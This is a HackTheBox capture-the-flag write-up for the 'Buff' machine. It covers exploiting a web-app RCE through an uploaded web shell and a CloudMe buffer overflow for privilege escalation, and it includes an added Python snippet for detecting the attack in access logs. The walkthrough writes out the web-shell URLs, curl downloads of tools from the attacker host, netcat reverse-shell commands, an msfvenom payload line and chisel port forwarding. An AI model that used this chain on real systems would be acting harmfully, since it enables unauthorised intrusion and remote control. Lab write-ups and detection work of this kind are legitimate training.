Buff — HackTheBox (User and Root Flag) Write-Up
I experienced some problems while hacking this machine (Buff) on HackTheBox. It took me 2 days to get the root flag; that wasn't really needed, the problem was mine. So I thought of writing the step-by-step procedure to find the flags easily. Let's learn together, and let's get straight into the process.
If you are new to HackTheBox, go to Access, download your connection pack and run
sudo openvpn <user-name.ovpn>
When we go to the Machines tab we can see Buff there, with the IP 10.10.10.198.
As a start, run a basic scan with nmap: sudo nmap -sV -sC -sT -O 10.10.10.198. We can't find anything interesting; only port 8080 is open, so let's try the web app. In the real world, when testing web apps we first visit all the pages. Same here: when we visit the URI /contact.php
That's a nice hint to the next level. As usual, when we get a hint like this we need to google whether there are any known vulnerabilities to exploit. We can see there is a Remote Code Execution bug.
So let’s find the User flag first
So we got the exploit. Download it. When we read the exploit we can see that the bug is in the upload.php URI. Let's exploit it and see what we find; run the following command to launch the exploit:
python 48506.py http://10.10.10.198:8080/
Wow!! So let's try something cool. As said in the exploit, the bug is in upload.php and the files are uploaded to http://10.10.10.198:8080/upload/kamehameha.php?telepathy=<command-here>. Here kamehameha.php is the exploit file that was uploaded, and telepathy is the parameter through which we are going to run the commands. Next we need some files in order to proceed. Most of the files are already on our Kali machine; otherwise just google them and download (simple search and download).
Copy the file into a directory and in that same directory run:
sudo python3 -m http.server 80 — This will serve the directory over HTTP; find your IP using ifconfig.
If you don't have python3 installed: sudo apt install python3
Now we need to transfer nc.exe to the Windows machine via our browser (there are many ways; I preferred this one):
http://10.10.10.198:8080/upload/kamehameha.php?telepathy=curl -O 10.10.14.25/nc.exe
This will download nc.exe on the Windows machine. To confirm:
http://10.10.10.198:8080/upload/kamehameha.php?telepathy=dir
It will list the files in the directory and you can see kamehameha.php and nc.exe there. So let's make a reverse shell to our Linux machine. For that we need a netcat listener.
To connect back to it, run the following in the browser:
http://10.10.10.198:8080/upload/kamehameha.php?telepathy=nc -e cmd.exe 10.10.14.25 1337
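Seen from the defender's side, the browser requests above leave an obvious trail in the XAMPP access log: PHP executed out of the upload directory with a shell command in the query string. As an added example (not from the write-up or the box), this Python snippet flags that pattern over constructed log lines; the log format, the client IPs and the file names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines for illustration (not taken from the machine).
SAMPLE_LOG = """\
10.10.14.25 - - [20/Jul/2020:10:01:02 +0000] "GET /contact.php HTTP/1.1" 200 2311
10.10.14.25 - - [20/Jul/2020:10:01:40 +0000] "POST /upload.php?id=kamehameha HTTP/1.1" 200 15
10.10.14.25 - - [20/Jul/2020:10:01:41 +0000] "GET /upload/kamehameha.php?telepathy=dir HTTP/1.1" 200 812
10.10.14.25 - - [20/Jul/2020:10:02:05 +0000] "GET /upload/kamehameha.php?telepathy=curl%20-O%2010.10.14.25/nc.exe HTTP/1.1" 200 0
10.10.14.25 - - [20/Jul/2020:10:02:30 +0000] "GET /upload/kamehameha.php?telepathy=nc%20-e%20cmd.exe%2010.10.14.25%201337 HTTP/1.1" 200 0
192.168.1.10 - - [20/Jul/2020:10:03:00 +0000] "GET /upload/avatar.png HTTP/1.1" 200 4096
"""

# Common Log Format prefix: client, identd, user, [timestamp] "METHOD target proto" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Windows shell commands that have no business appearing as a query-string value.
SHELL_COMMANDS = {"cmd.exe", "dir", "curl", "nc", "certutil", "powershell", "whoami", "ipconfig", "net"}


def classify_request(target):
    # Return the reasons a request target looks like web-shell abuse (empty list = benign).
    parts = urlsplit(target)
    path = parts.path.lower()
    reasons = []
    # Rule 1: an upload directory should serve static files, never execute PHP.
    if path.startswith("/upload/") and path.endswith(".php"):
        reasons.append("php_in_upload_dir")
    # Rule 2: a percent-decoded parameter value that is, or embeds, a shell command.
    for _name, value in parse_qsl(parts.query, keep_blank_values=True):
        tokens = value.lower().split()
        if tokens and (tokens[0] in SHELL_COMMANDS or "cmd.exe" in tokens):
            reasons.append("command_in_query")
            break
    return reasons


def analyse_access_log(text):
    # One alert dict per suspicious line; unparseable lines are skipped.
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and (reasons := classify_request(m["target"])):
            alerts.append({"ip": m["ip"], "ts": m["ts"], "target": m["target"], "reasons": reasons})
    return alerts
```

Running analyse_access_log over SAMPLE_LOG returns the three kamehameha.php requests and nothing else; the POST to upload.php itself is only caught if you also baseline which users may upload at all.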
The user flag is actually on the Desktop, so just read it from there.
Hooray, we got the user flag! Submit it on HackTheBox; now we need to find one more. In order to find the root flag we need Admin privileges, so we can't directly access /users/Administrator/Desktop/root.txt.
Let’s find the Root Flag
This one took 70% of my time, due to some problem with my ssh. Actually it's simple. So let's dig more on the Windows machine; as we dig we can see there is a file in the Downloads folder.
In order to confirm whether this file is in use, let's go back once more to the previous upload directory and
download winPEAS.exe.
If you can't find the file, run the following commands in the directory where we put nc.exe and the other files:
git clone https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/
cp privilege-escalation-awesome-scripts-suite/winPEAS/winPEASexe/winPEAS/bin/x64/Release/winPEAS.exe ./
This will copy the file to the directory.
Download chisel.exe and chisel on Linux — I preferred this because, as I already said, I had some problem connecting over ssh, so for that purpose I use chisel. To download and install chisel:
https://github.com/jpillora/chisel/releases/download/v1.7.2/chisel_1.7.2_windows_amd64.gz → chisel for Windows; download the file and extract chisel.exe to our directory
sudo apt install golang-go → if go is not installed
go get github.com/jpillora/chisel → install chisel on Linux
cp ~/go/bin/chisel /bin/ → lets you run chisel from the terminal
chisel -h → to check if it’s installed properly
Now we need to transfer those files to our Windows machine. If you closed the python http.server we opened previously, run sudo python3 -m http.server 80 once more (make sure http.server is started in the directory that holds chisel.exe and winPEAS.exe). Then, to transfer the files from that directory:
http://10.10.10.198:8080/upload/kamehameha.php?telepathy=curl -O 10.10.14.25/chisel.exe
http://10.10.10.198:8080/upload/kamehameha.php?telepathy=curl -O 10.10.14.25/winPEAS.exe
Make sure your Windows shell is still connected and running, just by ping 10.10.10.198; otherwise connect once more and proceed.
After all that, run dir on the Windows server to list the transferred files. If they are all there:
Now run winPEAS.exe. It will show us the weak spots: privileges, running processes and things like that. When we look carefully we can see that port 8888 is used by something.
So we can confirm that CloudMe is running (it's on 8888); now try to find any exploits. You will get one here: https://www.exploit-db.com/exploits/48389. Download it.
Now we need to change the payload in the exploit. For that, run
msfvenom -p windows/exec CMD='C:\xampp\htdocs\gym\upload\nc.exe -e cmd.exe 10.10.14.25 7777' -b '\x00\x0A\x0D' -f python -v payload
Copy the generated payload and replace the one in 48389.py with it.
Now we can forward port 8888 from Windows to our Linux machine in order to exploit the overflow vulnerability.
chisel server -p 8080 -reverse → on Linux
chisel.exe client 10.10.14.25:8080 R:8888:127.0.0.1:8888 → on the Windows server
There we can see a connection come in.
Let's listen on the port we used when creating the payload, i.e. 7777, and run the exploit in another terminal to get the admin shell:
nc -lvnp 7777
python2.7 48389.py
We can see the admin shell on nc. If nothing happens, run the exploit 2–3 times; why it sometimes fails I don't really know.
After getting into the admin shell:
cd /users/Administrator/Desktop/
type root.txt → this is the 2nd flag
ENJOY ENJOY ENJOY
!! I accidentally quit a terminal that was running the shells, and that's why you miss screenshots. I don't have time to do that again, so apologies. !!
You may have seen people using ssh or plink.exe in order to find the root flag. For me, when I ran the plink.exe command on Windows it always showed connection timed out, so I decided to try chisel instead.
Find me on Twitter: iam_j0ker